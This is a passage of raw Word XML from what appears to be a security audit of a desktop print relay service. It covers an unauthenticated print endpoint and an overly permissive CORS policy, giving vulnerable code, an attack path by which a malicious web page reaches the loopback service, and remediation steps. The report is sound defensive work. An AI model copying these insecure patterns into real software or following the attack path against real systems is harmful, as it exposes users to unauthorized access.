      </w:r>
    </w:p>
    <w:p w14:paraId="59468944" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(accessToken))        return BadRequest("X-AccessToken ...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020CE8F2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(clientSecretJwt))    return BadRequest("X-ClientSecretJwt ...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44514D54" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>queue = GetPrintQueueForPrintDocType(printDocType);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1058F2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(queue))              return BadRequest("Print Queue is not mapped ...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54312D0E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (IsNullOrEmpty(documentName))       return BadRequest("X-Document-Name ...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A56B6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PdfPrinting.PrintPdf(content, queue, documentName, ...);   // &lt;-- prints, unauthenticated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD8226" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C76B35D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>By contrast, PrintPdfWithCopies contains the guard: if (!await isUserTokenValid(...)) return Unauthorized("Authorization failed"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>); —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> confirming the omission in PrintPdf is an enforcement gap, not a design intent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CBBC2B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE9F1B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38718986" wp14:editId="76B5A85A">
            <wp:extent cx="5943600" cy="38903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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3890356"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A8E58" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure F3 — Attack path: a second print endpoint has no authorization marker and only checks that headers exist, so any request prints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3C75F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="7A246C96" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6266B7F7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: ensure every print path enforces the same validated login. The fix is centralization, so no endpoint can be left unprotected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC7A24" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Add authentication/authorization middleware to the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D670C7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Register authentication and authorization in Startup and place the middleware before MVC so all controllers are covered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B13087" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>public void Configure(IApplicationBuilder app, ...) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    app.UseRouting();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    app.UseAuthentication();   // &lt;-- add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    app.UseAuthorization();    // &lt;-- add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    app.UseEndpoints(e =&gt; e.MapControllers());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F614B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Require authorization by default, controller-wide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12644135" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Apply [Authorize] at the controller level (or a global fallback policy) so new actions are protected automatically rather than per-method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B264241" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[Authorize]                       // applies to ALL actions, including PrintPdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>[ApiController]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>public class PrintController : ControllerBase { ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C893B2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. Remove the cosmetic header-presence checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD71CEF" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Delete the string.IsNullOrEmpty(...) header checks — they validate nothing. Authorization now happens in middleware using the corrected token validation from Finding 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197DCDAD" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// DELETE these lines from PrintPdf():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>// if (string.IsNullOrEmpty(Request.Headers["X-AccessToken"])) return BadRequest();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>// ...the [Authorize] attribute + middleware now enforce a real, validated identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4818F4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 4. Set a deny-by-default fallback policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1F779" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Configure a fallback authorization policy so any endpoint without an explicit policy still requires an authenticated user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAFA496" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>services.AddAuthorization(o =&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    o.FallbackPolicy = new AuthorizationPolicyBuilder().RequireAuthenticatedUser().Build());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A0136" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) POST /printers/{docType}/print/pdf with junk headers returns 401, not 200; (2) the same request with a valid token still prints; (3) a newly added test endpoint is protected without extra code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D2BB2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="3421EC2F" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E9A7A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-862: Missing Authorization — cwe.mitre.org/data/definitions/862.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228E4CD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-306: Missing Authentication for Critical Function — cwe.mitre.org/data/definitions/306.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE8C4D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10 2021 A01: Broken Access Control — owasp.org/Top10/A01_2021-Broken_Access_Control/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B93B50" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196F8765" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF65F40" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532F15B6" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF88894" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA58257" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114A134A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C85F907" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ED44E5" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6E7383" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141FED28" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D1D720" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7708C7" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F40EF7C" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF3F206"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1F332E80" w14:textId="77777777" w:rsidTr="002048E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E2567FF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="_Toc9000003"/>
            <w:bookmarkStart w:id="11" w:name="_Toc232079913"/>
            <w:r>
              <w:t>4. Overly Permissive CORS Policy Enabling Cross-Site Exploitation - High</w:t>
            </w:r>
            <w:bookmarkEnd w:id="10"/>
            <w:bookmarkEnd w:id="11"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C1365BF"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="098B9D60" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C211A2E"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High</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 6.5 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF63A4B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Startup.ConfigureServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — global CORS policy applied via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>UseCors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to all endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D271214" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Kestrel HTTP API applies a single CORS policy to every endpoint that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>calls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> AllowAnyOrigin() together with AllowAnyHeader() and the methods GET, POST, and OPTIONS. Because any origin is permitted and any request header is allowed, any website loaded in the user's browser can issue cross-origin requests to the relay — including preflighted requests carrying the custom X-AccessToken / X-ProviderValidationUrl / X-ClientSecretJwt headers — and read the responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED8A5E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This policy is the delivery mechanism that elevates the authentication-bypass and missing-authorization findings from local-only issues to browser-delivered, remotely exploitable ones. Independently, it exposes the response bodies of all unauthenticated GET endpoints (printer enumeration, status, doc-type maps) to any website. The listener itself binds to 127.0.0.1, which is good practice, but loopback binding does not mitigate a browser-based attacker; the malicious page simply targets http://127.0.0.1:&lt;port&gt;, and the port is discoverable via the unauthenticated GET endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E210CA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AAEAA7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8D745" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30673A4C"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03345359" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E39BA" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A9577B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ConfigureServices()  /  Configure()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E0262" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>AllowAnyOrigin() + AllowAnyHeader(); methods limited to GET/POST/OPTIONS; applied via app.UseCors()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FE4C0F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>ASP.NET Core CORS middleware configuration in Startup class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8A8D9" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62327F05" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>builder.AllowAnyOrigin().AllowAnyHeader().WithMethods("GET","POST","OPTIONS");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463FDC20" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEC9464" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Startup.ConfigureServices() — CORS policy definition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>services.AddCors(options =&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
